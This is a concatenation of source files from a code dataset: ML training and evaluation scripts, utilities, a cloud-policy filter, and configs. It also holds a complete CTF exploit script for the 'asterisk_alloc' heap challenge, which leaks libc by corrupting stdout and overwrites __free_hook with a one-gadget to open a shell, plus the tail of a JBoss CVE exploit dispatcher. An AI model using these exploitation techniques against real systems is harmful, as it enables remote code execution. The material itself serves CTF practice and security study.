ExpRedHatJBoss.cve_2010_0738()
elif kwargs['pocname'] == "cve_2010_1428":
ExpRedHatJBoss.cve_2010_1428()
elif kwargs['pocname'] == "cve_2015_7501":
ExpRedHatJBoss.cve_2015_7501()
else:
ExpRedHatJBoss.cve_2010_0738()
ExpRedHatJBoss.cve_2010_1428()
ExpRedHatJBoss.cve_2015_7501() | [
"[email protected]"
] | |
b6470cf42404b1ad3249e48f109c35b861ee9b2f | ce68c14ee067a68ef50f2f7e7a3a8e6876b29c3e | /main.py | 199af54fb6c6c516838deea51a7fd0e147c7480c | [] | no_license | lowkey159357/vehicle_prj_vgg16 | 7bc186fa43ed2c4913698490f1460acbaa362c27 | 4f727f54f017d84dce2bedbf31b6a4f17b5c5c20 | refs/heads/master | 2020-03-25T20:18:50.005596 | 2018-08-14T06:27:36 | 2018-08-14T06:27:36 | 144,125,718 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,498 | py | #!/usr/bin/env python3
#coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
def parse_args(check=True):
parser = argparse.ArgumentParser()
# train
parser.add_argument('--dataset_dir', type=str,default=' ')
parser.add_argument('--logs_train_dir', type=str, default=' ')
parser.add_argument('--checkpoint_dir', type=str, default=' ')
parser.add_argument('--checkpoint_exclude_scopes', type=str, default=' ')
parser.add_argument('--max_epoc', type=int, default=60)
parser.add_argument('--num_epoc', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.0001)
parser.add_argument('--num_train_img', type=int, default=43971)
parser.add_argument('--batch_size', type=int, default=16)
parser.add_argument('--number_of_classes', type=int,default=764)
parser.add_argument('--hide_prob', type=float, default = 0.10)
parser.add_argument('--sigma', type=float, default = 0.65)
# eval
parser.add_argument('--val_loop', type=int,default=256)
FLAGS, unparsed = parser.parse_known_args()
return FLAGS, unparsed
train_cmd = 'python ./train.py --dataset_dir={dataset_dir} --logs_train_dir={logs_train_dir} \
--checkpoint_dir={checkpoint_dir} --checkpoint_exclude_scopes={checkpoint_exclude_scopes} --num_epoc={num_epoc} \
--learning_rate={learning_rate} --num_train_img={num_train_img} \
--batch_size={batch_size} --number_of_classes={number_of_classes} --hide_prob={hide_prob} --sigma={sigma} '
eval_cmd = 'python ./eval.py --dataset_dir={dataset_dir} --checkpoint_dir={checkpoint_dir} \
--number_of_classes={number_of_classes} --sigma={sigma} --val_loop={val_loop} --batch_size={batch_size} '
if __name__ == '__main__':
FLAGS, unparsed = parse_args()
print('current working dir [{0}]'.format(os.getcwd()))
w_d = os.path.dirname(os.path.abspath(__file__))
print('change wording dir to [{0}]'.format(w_d))
os.chdir(w_d)
for i in range(FLAGS.max_epoc):
print('***************************epock {}*********************************'.format(i))
# train 1 epoch
print('################ train ################')
p = os.popen(train_cmd.format(**{'dataset_dir': FLAGS.dataset_dir, 'logs_train_dir': FLAGS.logs_train_dir,
'checkpoint_dir': FLAGS.checkpoint_dir,'checkpoint_exclude_scopes': FLAGS.checkpoint_exclude_scopes,
'num_epoc': FLAGS.num_epoc,'learning_rate': FLAGS.learning_rate, 'num_train_img': FLAGS.num_train_img,
'batch_size': FLAGS.batch_size, 'number_of_classes': FLAGS.number_of_classes,
'hide_prob': FLAGS.hide_prob, 'sigma': FLAGS.sigma}))
for l in p:
print(l.strip())
# eval
print('################ eval ################')
p = os.popen(eval_cmd.format(**{'dataset_dir': FLAGS.dataset_dir, 'checkpoint_dir': FLAGS.logs_train_dir,
'number_of_classes':FLAGS.number_of_classes, 'sigma': FLAGS.sigma,
'val_loop': FLAGS.val_loop, 'batch_size': FLAGS.batch_size}))
for l in p:
print(l.strip())
| [
"[email protected]"
] | |
f63fe9e05ffcac73aadcdc96a5641051d9366134 | 54fd000e2e2ab7325358b64306b124e01d677472 | /utils.py | 05ecc36cf44a2d346b7d886660e1622de45efc2d | [
"MIT"
] | permissive | Zendelo/ProxyVotingSim | 0ee88057dc185cd28e4da63446947a0bb9b26754 | dae389030a1f0ec21d7842f68da49e31aad0bbc5 | refs/heads/master | 2021-08-08T21:34:07.617318 | 2017-11-09T18:26:44 | 2017-11-09T18:26:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,484 | py | from itertools import combinations
from random import randint, uniform
# Kendell's Tao distance between vector v and u
def kendall_tau(v, u):
pairs = combinations(v, 2)
dist = 0
for x, y in pairs:
a = v.index(x) - v.index(y)
b = u.index(x) - u.index(y)
# if discordant (different signs)
if a * b < 0:
dist += 1
return dist
# Borda voting rule, will give a score to each option according to its rank, and will return a final result
# In order to avoid ties, we've added uniform noise to each score
def borda_voting_rule(ballots, a):
scores = {}
for i in range(a):
scores[i] = uniform(0, 0.01)
for voter in ballots:
for i in range(a):
scores[voter.get_vote()[i]] += a - 1 - i
return sorted(scores, key=scores.__getitem__, reverse=True)
# Boyer Moore majority vote algorithm, tie will be {0,1} randomly
# returns a single vector {0,1} of size k
def bm_majority_vote(ballots, k):
result = []
for i in range(k):
m = None
count = 0
for agent in ballots:
if count == 0:
m = agent.get_vote()[i]
count = 1
elif m == agent.get_vote()[i]:
count += 1
else:
count -= 1
if count > 0:
result.append(m)
elif count < 0:
result.append(abs(1 - m))
else:
result.append(randint(0, 1))
return result
| [
"[email protected]"
] | |
5620c7f96f4cb52ee75460418ccef2a3ab693171 | fb813a01c5cb15f9b2d703366d3ee8f68d935cbb | /Oblig3/ner_eval.py | cc6d4ac95ec06a30cad44b4759a2709cb177db8b | [
"MIT"
] | permissive | fabiorodp/IN5550_Neural_Methods_in_Natural_Language_Processing | 2c803446fff7868644b9d1351eba40775cdfaaa5 | 4d3b2ed56b56e016413ae1544e19ad2a2c0ef047 | refs/heads/main | 2023-07-27T20:50:36.595335 | 2021-09-06T14:30:55 | 2021-09-06T14:30:55 | 329,799,108 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,040 | py | import logging
from collections import namedtuple
from copy import deepcopy
# From https://github.com/davidsbatista/NER-Evaluation
logging.basicConfig(
format="%(asctime)s %(name)s %(levelname)s: %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level="DEBUG",
)
Entity = namedtuple("Entity", "e_type start_offset end_offset")
class Evaluator:
def __init__(self, true, pred, tags):
""""""
if len(true) != len(pred):
raise ValueError("Number of predicted documents does not equal true")
self.true = true
self.pred = pred
self.tags = tags
# Setup dict into which metrics will be stored.
self.metrics_results = {
"correct": 0,
"incorrect": 0,
"partial": 0,
"missed": 0,
"spurious": 0,
"possible": 0,
"actual": 0,
"precision": 0,
"recall": 0,
}
# Copy results dict to cover the four schemes.
self.results = {
"strict": deepcopy(self.metrics_results),
"ent_type": deepcopy(self.metrics_results),
"partial": deepcopy(self.metrics_results),
"exact": deepcopy(self.metrics_results),
}
# Create an accumulator to store results
self.evaluation_agg_entities_type = {e: deepcopy(self.results) for e in tags}
def evaluate(self):
logging.info(
"Imported %s predictions for %s true examples",
len(self.pred),
len(self.true),
)
for true_ents, pred_ents in zip(self.true, self.pred):
# Check that the length of the true and predicted examples are the
# same. This must be checked here, because another error may not
# be thrown if the lengths do not match.
if len(true_ents) != len(pred_ents):
raise ValueError("Prediction length does not match true example length")
# Compute results for one message
tmp_results, tmp_agg_results = compute_metrics(
collect_named_entities(true_ents),
collect_named_entities(pred_ents),
self.tags,
)
# Cycle through each result and accumulate
# TODO: Combine these loops below:
for eval_schema in self.results:
for metric in self.results[eval_schema]:
self.results[eval_schema][metric] += tmp_results[eval_schema][
metric
]
# Calculate global precision and recall
self.results = compute_precision_recall_wrapper(self.results)
# Aggregate results by entity type
for e_type in self.tags:
for eval_schema in tmp_agg_results[e_type]:
for metric in tmp_agg_results[e_type][eval_schema]:
self.evaluation_agg_entities_type[e_type][eval_schema][
metric
] += tmp_agg_results[e_type][eval_schema][metric]
# Calculate precision recall at the individual entity level
self.evaluation_agg_entities_type[
e_type
] = compute_precision_recall_wrapper(
self.evaluation_agg_entities_type[e_type]
)
return self.results, self.evaluation_agg_entities_type
def collect_named_entities(tokens):
"""
Creates a list of Entity named-tuples, storing the entity type and the start and end
offsets of the entity.
:param tokens: a list of tags
:return: a list of Entity named-tuples
"""
named_entities = []
start_offset = None
end_offset = None
ent_type = None
for offset, token_tag in enumerate(tokens):
if token_tag == "O":
if ent_type is not None and start_offset is not None:
end_offset = offset - 1
named_entities.append(Entity(ent_type, start_offset, end_offset))
start_offset = None
end_offset = None
ent_type = None
elif ent_type is None:
ent_type = token_tag[2:]
start_offset = offset
elif ent_type != token_tag[2:] or (
ent_type == token_tag[2:] and token_tag[:1] == "B"
):
end_offset = offset - 1
named_entities.append(Entity(ent_type, start_offset, end_offset))
# start of a new entity
ent_type = token_tag[2:]
start_offset = offset
end_offset = None
# catches an entity that goes up until the last token
if ent_type is not None and start_offset is not None and end_offset is None:
named_entities.append(Entity(ent_type, start_offset, len(tokens) - 1))
return named_entities
def compute_metrics(true_named_entities, pred_named_entities, tags):
eval_metrics = {
"correct": 0,
"incorrect": 0,
"partial": 0,
"missed": 0,
"spurious": 0,
"precision": 0,
"recall": 0,
}
# overall results
evaluation = {
"strict": deepcopy(eval_metrics),
"ent_type": deepcopy(eval_metrics),
"partial": deepcopy(eval_metrics),
"exact": deepcopy(eval_metrics),
}
# results by entity type
evaluation_agg_entities_type = {e: deepcopy(evaluation) for e in tags}
# keep track of entities that overlapped
true_which_overlapped_with_pred = []
# Subset into only the tags that we are interested in.
# NOTE: we remove the tags we don't want from both the predicted and the
# true entities. This covers the two cases where mismatches can occur:
#
# 1) Where the model predicts a tag that is not present in the true data
# 2) Where there is a tag in the true data that the model is not capable of
# predicting.
true_named_entities = [ent for ent in true_named_entities if ent.e_type in tags]
pred_named_entities = [ent for ent in pred_named_entities if ent.e_type in tags]
# go through each predicted named-entity
for pred in pred_named_entities:
found_overlap = False
# Check each of the potential scenarios in turn. See
# http://www.davidsbatista.net/blog/2018/05/09/Named_Entity_Evaluation/
# for scenario explanation.
# Scenario I: Exact match between true and pred
if pred in true_named_entities:
true_which_overlapped_with_pred.append(pred)
evaluation["strict"]["correct"] += 1
evaluation["ent_type"]["correct"] += 1
evaluation["exact"]["correct"] += 1
evaluation["partial"]["correct"] += 1
# for the agg. by e_type results
evaluation_agg_entities_type[pred.e_type]["strict"]["correct"] += 1
evaluation_agg_entities_type[pred.e_type]["ent_type"]["correct"] += 1
evaluation_agg_entities_type[pred.e_type]["exact"]["correct"] += 1
evaluation_agg_entities_type[pred.e_type]["partial"]["correct"] += 1
else:
# check for overlaps with any of the true entities
for true in true_named_entities:
pred_range = range(pred.start_offset, pred.end_offset)
true_range = range(true.start_offset, true.end_offset)
# Scenario IV: Offsets match, but entity type is wrong
if (
true.start_offset == pred.start_offset
and pred.end_offset == true.end_offset
and true.e_type != pred.e_type
):
# overall results
evaluation["strict"]["incorrect"] += 1
evaluation["ent_type"]["incorrect"] += 1
evaluation["partial"]["correct"] += 1
evaluation["exact"]["correct"] += 1
# aggregated by entity type results
evaluation_agg_entities_type[true.e_type]["strict"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["partial"]["correct"] += 1
evaluation_agg_entities_type[true.e_type]["exact"]["correct"] += 1
true_which_overlapped_with_pred.append(true)
found_overlap = True
break
# check for an overlap i.e. not exact boundary match, with true entities
elif find_overlap(true_range, pred_range):
true_which_overlapped_with_pred.append(true)
# Scenario V: There is an overlap (but offsets do not match
# exactly), and the entity type is the same.
# 2.1 overlaps with the same entity type
if pred.e_type == true.e_type:
# overall results
evaluation["strict"]["incorrect"] += 1
evaluation["ent_type"]["correct"] += 1
evaluation["partial"]["partial"] += 1
evaluation["exact"]["incorrect"] += 1
# aggregated by entity type results
evaluation_agg_entities_type[true.e_type]["strict"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"][
"correct"
] += 1
evaluation_agg_entities_type[true.e_type]["partial"][
"partial"
] += 1
evaluation_agg_entities_type[true.e_type]["exact"][
"incorrect"
] += 1
found_overlap = True
break
# Scenario VI: Entities overlap, but the entity type is
# different.
else:
# overall results
evaluation["strict"]["incorrect"] += 1
evaluation["ent_type"]["incorrect"] += 1
evaluation["partial"]["partial"] += 1
evaluation["exact"]["incorrect"] += 1
# aggregated by entity type results
# Results against the true entity
evaluation_agg_entities_type[true.e_type]["strict"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["partial"][
"partial"
] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["exact"][
"incorrect"
] += 1
# Results against the predicted entity
# evaluation_agg_entities_type[pred.e_type]['strict']['spurious'] += 1
found_overlap = True
break
# Scenario II: Entities are spurious (i.e., over-generated).
if not found_overlap:
# Overall results
evaluation["strict"]["spurious"] += 1
evaluation["ent_type"]["spurious"] += 1
evaluation["partial"]["spurious"] += 1
evaluation["exact"]["spurious"] += 1
# Aggregated by entity type results
# NOTE: when pred.e_type is not found in tags
# or when it simply does not appear in the test set, then it is
# spurious, but it is not clear where to assign it at the tag
# level. In this case, it is applied to all target_tags
# found in this example. This will mean that the sum of the
# evaluation_agg_entities will not equal evaluation.
for true in tags:
evaluation_agg_entities_type[true]["strict"]["spurious"] += 1
evaluation_agg_entities_type[true]["ent_type"]["spurious"] += 1
evaluation_agg_entities_type[true]["partial"]["spurious"] += 1
evaluation_agg_entities_type[true]["exact"]["spurious"] += 1
# Scenario III: Entity was missed entirely.
for true in true_named_entities:
if true in true_which_overlapped_with_pred:
continue
else:
# overall results
evaluation["strict"]["missed"] += 1
evaluation["ent_type"]["missed"] += 1
evaluation["partial"]["missed"] += 1
evaluation["exact"]["missed"] += 1
# for the agg. by e_type
evaluation_agg_entities_type[true.e_type]["strict"]["missed"] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"]["missed"] += 1
evaluation_agg_entities_type[true.e_type]["partial"]["missed"] += 1
evaluation_agg_entities_type[true.e_type]["exact"]["missed"] += 1
# Compute 'possible', 'actual' according to SemEval-2013 Task 9.1 on the
# overall results, and use these to calculate precision and recall.
for eval_type in evaluation:
evaluation[eval_type] = compute_actual_possible(evaluation[eval_type])
# Compute 'possible', 'actual', and precision and recall on entity level
# results. Start by cycling through the accumulated results.
for entity_type, entity_level in evaluation_agg_entities_type.items():
# Cycle through the evaluation types for each dict containing entity
# level results.
for eval_type in entity_level:
evaluation_agg_entities_type[entity_type][
eval_type
] = compute_actual_possible(entity_level[eval_type])
return evaluation, evaluation_agg_entities_type
def find_overlap(true_range, pred_range):
"""Find the overlap between two ranges
Find the overlap between two ranges. Return the overlapping values if
present, else return an empty set().
Examples:
>>> find_overlap((1, 2), (2, 3))
2
>>> find_overlap((1, 2), (3, 4))
set()
"""
true_set = set(true_range)
pred_set = set(pred_range)
overlaps = true_set.intersection(pred_set)
return overlaps
def compute_actual_possible(results):
"""
Takes a result dict that has been output by compute metrics.
Returns the results dict with actual, possible populated.
When the results dicts is from partial or ent_type metrics, then
partial_or_type=True to ensure the right calculation is used for
calculating precision and recall.
"""
correct = results["correct"]
incorrect = results["incorrect"]
partial = results["partial"]
missed = results["missed"]
spurious = results["spurious"]
# Possible: number annotations in the gold-standard which contribute to the
# final score
possible = correct + incorrect + partial + missed
# Actual: number of annotations produced by the NER system
actual = correct + incorrect + partial + spurious
results["actual"] = actual
results["possible"] = possible
return results
def compute_precision_recall(results, partial_or_type=False):
"""
Takes a result dict that has been output by compute metrics.
Returns the results dict with precison and recall populated.
When the results dicts is from partial or ent_type metrics, then
partial_or_type=True to ensure the right calculation is used for
calculating precision and recall.
"""
actual = results["actual"]
possible = results["possible"]
partial = results["partial"]
correct = results["correct"]
if partial_or_type:
precision = (correct + 0.5 * partial) / actual if actual > 0 else 0
recall = (correct + 0.5 * partial) / possible if possible > 0 else 0
else:
precision = correct / actual if actual > 0 else 0
recall = correct / possible if possible > 0 else 0
results["precision"] = precision
results["recall"] = recall
return results
def compute_precision_recall_wrapper(results):
"""
Wraps the compute_precision_recall function and runs on a dict of results
"""
results_a = {
key: compute_precision_recall(value, True)
for key, value in results.items()
if key in ["partial", "ent_type"]
}
results_b = {
key: compute_precision_recall(value)
for key, value in results.items()
if key in ["strict", "exact"]
}
results = {**results_a, **results_b}
return results
| [
"[email protected]"
] | |
f4129e0267f16805949a94670dee66a10c5ba43e | 9efca95a55cb4df52d895d42f1ec10331516a734 | /tools/c7n_gcp/c7n_gcp/filters/recommender.py | e2d2fd72b777c8c8fb89b9452f088c9e393b557f | [
"Apache-2.0"
] | permissive | cloud-custodian/cloud-custodian | 519e602abe00c642786441b64cc40857ef5bc9de | 27563cf4571040f923124e1acb2463f11e372225 | refs/heads/main | 2023-09-04T10:54:55.963703 | 2023-09-01T17:40:17 | 2023-09-01T17:40:17 | 52,837,350 | 3,327 | 1,096 | Apache-2.0 | 2023-09-14T14:03:30 | 2016-03-01T01:11:20 | Python | UTF-8 | Python | false | false | 4,693 | py | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
"""
GCP Recommender filters
"""
import json
from pathlib import Path
import jmespath
from c7n.exceptions import PolicyValidationError
from c7n.filters.core import Filter
from c7n.utils import local_session, type_schema
from c7n_gcp.provider import resources as gcp_resources
RECOMMENDER_DATA_PATH = Path(__file__).parent / "recommender.json"
_RECOMMENDER_DATA = None
def get_recommender_data():
global _RECOMMENDER_DATA
if _RECOMMENDER_DATA is None:
with open(RECOMMENDER_DATA_PATH) as fh:
_RECOMMENDER_DATA = json.load(fh)
return _RECOMMENDER_DATA
class RecommenderFilter(Filter):
"""Use GCP Resource Recommendations to filter resources
for a complete list and applicable resource types see
https://cloud.google.com/recommender/docs/recommenders
ie. find idle compute disks to snapshot and delete.
:example:
.. code-block:: yaml
policies:
- name: gcp-unused-disk
resource: gcp.disk
filters:
- type: recommend
id: google.compute.disk.IdleResourceRecommender
actions:
- snapshot
- delete
"""
schema = type_schema(
"recommend",
id={"type": "string"},
# state={'enum': ['ACTIVE', 'CLAIMED', 'SUCCEEDED', 'FAILED', 'DISMISSED']}
# sub_type={'enum': 'string'}
required=("id",),
)
schema_alias = True
annotation_key = 'c7n:recommend'
def get_permissions(self):
rec_id = self.data.get("id")
if not rec_id:
return []
prefix = get_recommender_data().get(rec_id, {}).get("permission_prefix")
if not prefix:
return []
return [prefix + ".get", prefix + ".list"]
def validate(self):
rtype = "gcp.%s" % self.manager.type
rec_id = self.data["id"]
all_recs = get_recommender_data()
if rec_id not in all_recs or all_recs[rec_id].get('resource', '') != rtype:
valid_ids = {r["id"] for r in all_recs.values() if r.get("resource") == rtype}
raise PolicyValidationError(
f"recommendation id:{rec_id} is not valid for {rtype}, valid: {valid_ids}"
)
self.rec_info = all_recs[rec_id]
def process(self, resources, event=None):
session = local_session(self.manager.session_factory)
recommendations = self.get_recommendations(session, resources)
return self.match_resources(recommendations, resources)
def get_recommendations(self, session, resources):
client = session.client(
"recommender", "v1", "projects.locations.recommenders.recommendations"
)
project = session.get_default_project()
regions = self.get_regions(resources)
recommends = []
for r in regions:
parent = (
f"projects/{project}/locations/{r}/recommenders/{self.rec_info['id']}"
)
for page in client.execute_paged_query("list", {"parent": parent}):
recommends.extend(page.get('recommendations', []))
return recommends
def match_resources(self, recommends, resources):
results = []
rec_query = jmespath.compile('content.operationGroups[].operations[].resource')
for r in recommends:
rids = rec_query.search(r)
for rid in list(rids):
# some resource operations are about creating new resources, ie snapshot disk
# before delete, remove those to focus on extant resources.
if "$" in rid:
rids.remove(rid)
matched = list(self.match_ids(rids, resources))
for m in matched:
m.setdefault(self.annotation_key, []).append(r)
results.extend(matched)
return results
def match_ids(self, rids, resources):
rids = [r.split("/", 3)[-1] for r in rids]
for r in resources:
for rid in rids:
if rid in r["name"] or rid in r["selfLink"]:
yield r
def get_regions(self, resources):
locator = self.manager.resource_type._get_location
return list(set([locator(r) for r in resources]))
@classmethod
def register_resources(klass, registry, resource_class):
data = get_recommender_data()
rtype = "gcp.%s" % resource_class.type
for rec in data.values():
if rec.get("resource") == rtype:
resource_class.filter_registry.register("recommend", klass)
gcp_resources.subscribe(RecommenderFilter.register_resources)
| [
"[email protected]"
] | |
2a7f8fd9506a71f0cabc75f143c62442adf259cd | af165d72ac206153c9b16499e88f9c9f30a69c9a | /studies/mixture_feasibility/optimization_analysis/expanded_set/extract_gradients.py | aab1a01f2538916681860cedb0b3f7f1977e620a | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | openforcefield/nistdataselection | bc4b443ec3377e9f7f953bcf6535118423ff96ea | d797d597f4ff528a7219d58daa8ef6508d438b24 | refs/heads/master | 2020-06-12T01:05:22.757026 | 2020-05-18T22:44:10 | 2020-05-18T22:44:10 | 194,144,523 | 3 | 0 | MIT | 2020-05-19T02:10:56 | 2019-06-27T18:28:23 | Python | UTF-8 | Python | false | false | 1,643 | py | import os
from glob import glob
from evaluator.properties import Density, EnthalpyOfMixing, EnthalpyOfVaporization
from nistdataselection.analysis.processing import extract_gradients
from nistdataselection.utils import SubstanceType
def main():
output_directory = "gradients"
os.makedirs(output_directory, exist_ok=True)
# Define the names of the performed studies.
study_names = [
"h_mix_rho_x",
"h_mix_rho_x_rho_pure",
"h_mix_rho_x_rho_pure_h_vap",
"rho_pure_h_vap",
]
# Define the names of the properties which were benchmarked.
property_types = [
(Density, SubstanceType.Pure),
(EnthalpyOfVaporization, SubstanceType.Pure),
(Density, SubstanceType.Binary),
(EnthalpyOfMixing, SubstanceType.Binary),
]
# Extract gradients for each of the different environments.
partitioned_directory = os.path.join("partitioned_data")
all_environments = set(
tuple(os.path.basename(x).split("_"))
for y in study_names
for x in glob(os.path.join(partitioned_directory, y, "*"))
)
environments = {
SubstanceType.Pure: [x for x in all_environments if len(x) == 1],
SubstanceType.Binary: [x for x in all_environments if len(x) == 2],
}
gradients_per_environment = extract_gradients(
partitioned_directory,
property_types,
study_names,
environments,
partition_by_composition=True,
)
gradients_per_environment.to_csv(
os.path.join(output_directory, "per_composition.csv"), index=False
)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
70e9f26eb50270b5fde47ec114dfef0cb5083e3c | 020cc6ee33ddb4f7c4864e6c3ca4f9d2fd7db8b2 | /docs_source/conf.py | 59c3fd9e82db206d036e6955fbee569c860deb4d | [
"MIT"
] | permissive | ajunlonglive/many_requests | 8324867fd21d17864c41f153680f142963f03362 | f80df66c8b5cd0f59b3ef31622a36e8ebd30094e | refs/heads/main | 2023-03-24T03:42:21.827985 | 2021-03-23T10:54:40 | 2021-03-23T10:54:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,258 | py | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../'))
import sphinx_rtd_theme
# -- Project information -----------------------------------------------------
project = 'many_requests'
copyright = '2020, Josh Levy-Kramer. MIT license'
author = 'Josh Levy-Kramer'
# The full version, including alpha/beta/rc tags
release = 'v0.1.0'
# -- General configuration ---------------------------------------------------
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'recommonmark',
"sphinx_rtd_theme",
"sphinx.ext.napoleon"
]
napoleon_google_docstring = True
napoleon_use_param = False
napoleon_use_ivar = True
napoleon_include_init_with_doc = True
autodoc_member_order = 'bysource'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# Add markdown as a source suffix
source_suffix = {
'.rst': 'restructuredtext',
'.txt': 'markdown',
'.md': 'markdown',
}
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme' #'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static'] | [
"[email protected]"
] | |
df52d8103305e042682cdf07e8594e0dfd1c6719 | 371748c34afaa0579bab10b2cd8fcc8414e2feb0 | /2019/TokyoWestern-CTF/astrisk_alloc/exploit.py | 6648c803833b7d90102365cc2e97da0a4ff1b457 | [] | no_license | HexRabbit/CTF-writeup | 51c27a521c58ab21ac7ba89d449a91e28e90ece2 | 4d90ebe8dce78c8aa0c3994afabf10bd6fa7103a | refs/heads/master | 2022-03-04T23:13:53.231339 | 2022-02-24T09:38:29 | 2022-02-24T09:38:29 | 144,137,043 | 26 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | #!/usr/bin/env python
from pwn import *
context.arch = 'amd64'
context.terminal = ['tmux', 'neww']
context.log_level = 'debug'
#r = process('./asterisk_alloc', env={'LD_PRELOAD': './libc.so.6'})
r = remote('ast-alloc.chal.ctf.westerns.tokyo', 10001)
libc = ELF('./libc.so.6')
def malloc(n, s):
r.sendlineafter('choice: ', '1')
r.sendlineafter('Size: ', str(n))
r.sendafter('Data: ', s)
def calloc(n, s):
r.sendlineafter('choice: ', '2')
r.sendlineafter('Size: ', str(n))
r.sendafter('Data: ', s)
def realloc(n, s):
r.sendlineafter('choice: ', '3')
r.sendlineafter('Size: ', str(n))
if n != -1:
r.sendafter('Data: ', s)
def free(c):
r.sendlineafter('choice: ', '4')
r.sendlineafter('Which: ', c)
realloc(0x28, 'A')
free('r')
free('r')
# fail realloc to reset ptr to NULL
# overwrite next ptr onto fake chunk
realloc(-1, '')
realloc(0x28, '\x98')
# malloc size > tcache max size to get libc address
realloc(-1, '')
realloc(1400, 'A')
# calloc in advence
# to avoid "malloc(): memory corruption" if we calloc after we wrote _IO_write_base
calloc(0x200, 'A')
free('r')
realloc(-1, '')
# fake tcache chunk
realloc(0x100, '\x30'.ljust(8, '\0') + '\x60\x77') # guess stdout offset ?760
realloc(-1, '')
realloc(0x28, 'A')
realloc(-1, '')
# instead of using realloc, use malloc here to avoid realloc's *Little security check*
# __builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
# the code snippet below will fail the check
# realloc(0x28, 'A')
# realloc(-1, '') <-- fail here
malloc(0x28, 'A')
# overwrite _IO_write_base to leak libc address
realloc(0x28, p64(0x00000000fbad2887 + 0x1000) + p64(0) * 3 + '\x08')
libc.address = u64(r.recvn(6)+'\0\0') - 0x3ed8b0
print 'libc base:', hex(libc.address)
realloc(-1, '')
magic = libc.address + 0x4f322 # 0x10a38c, 0x4f2c5
# get shell
free('c')
free('c')
realloc(0x200, p64(libc.symbols['__free_hook']))
realloc(-1, '')
realloc(0x200, 'A')
realloc(-1, '')
realloc(0x200, p64(magic))
free('c')
r.interactive('>')
| [
"[email protected]"
] | |
cfeeef6a5a104412510c37699c7fd0e5884ed194 | c2c4ec34e9818fb12fbdb2b97fd4a3a497a9f250 | /account/decarators/decorator.py | 7563649c32053f89562ea2b9e88e2a986fa5a757 | [] | no_license | ismayilov1995/Todo_Django_Rest_API | e9c3e1f7cfbdfbaa058f742bcca2eab695ca8d34 | 74065f2ca864f774a6bd51a5b4c2ae6db683981a | refs/heads/master | 2020-11-30T06:45:02.071670 | 2019-12-31T10:50:22 | 2019-12-31T10:50:22 | 230,336,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | from django.shortcuts import HttpResponseRedirect, reverse
def anonymous_required(func):
def wrap(request, *arg, **kwargs):
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("mainPage"))
return func(request, *arg, **kwargs)
return wrap
| [
"[email protected]"
] | |
f28590b72d0df2f8c472d4388db457889bd494e7 | db5e6b310e20651b53621d01d59e432e2803da4e | /Stock_market/python_scripts/command_centre.py | 35f4bf1cd576caf036f7817789ad709f1af4316a | [
"Apache-2.0"
] | permissive | stanleychilton/portfolio | eb9f06e27c7869c7b8db4aaceaa0ae9cb16aee05 | 78a72b45fd2e3e5767ccf4261387c770181560be | refs/heads/master | 2023-03-14T06:28:36.482780 | 2023-03-08T01:42:16 | 2023-03-08T01:42:16 | 216,955,285 | 0 | 0 | null | 2022-06-21T17:40:38 | 2019-10-23T02:56:16 | PHP | UTF-8 | Python | false | false | 906 | py | import sell_stocks as ss
def time_until_end_of_day(dt=None):
if dt is None:
dt = datetime.now()
return ((24 - dt.hour - 1) * 60 * 60) + ((60 - dt.minute - 1) * 60) + (60 - dt.second)
while True:
from datetime import datetime
from time import sleep
now = datetime.now()
dt_string = now.strftime("%H%M")
print(dt_string)
if "0130" > dt_string and dt_string < "0720":
print("here")
exec(open('buy_stocks.py').read())
exec(open('purchased_stocks.py').read())
else:
ss.sell_all()
#exec(open('pull_all_stocks.py').read())
#exec(open('lowest_stocks.py').read())
sleep_time = time_until_end_of_day()+5430
print("sleeping for", sleep_time)
if sleep_time <= 0:
pass
else:
sleep(sleep_time)
exec(open('updating_stocks.py').read())
| [
"[email protected]"
] | |
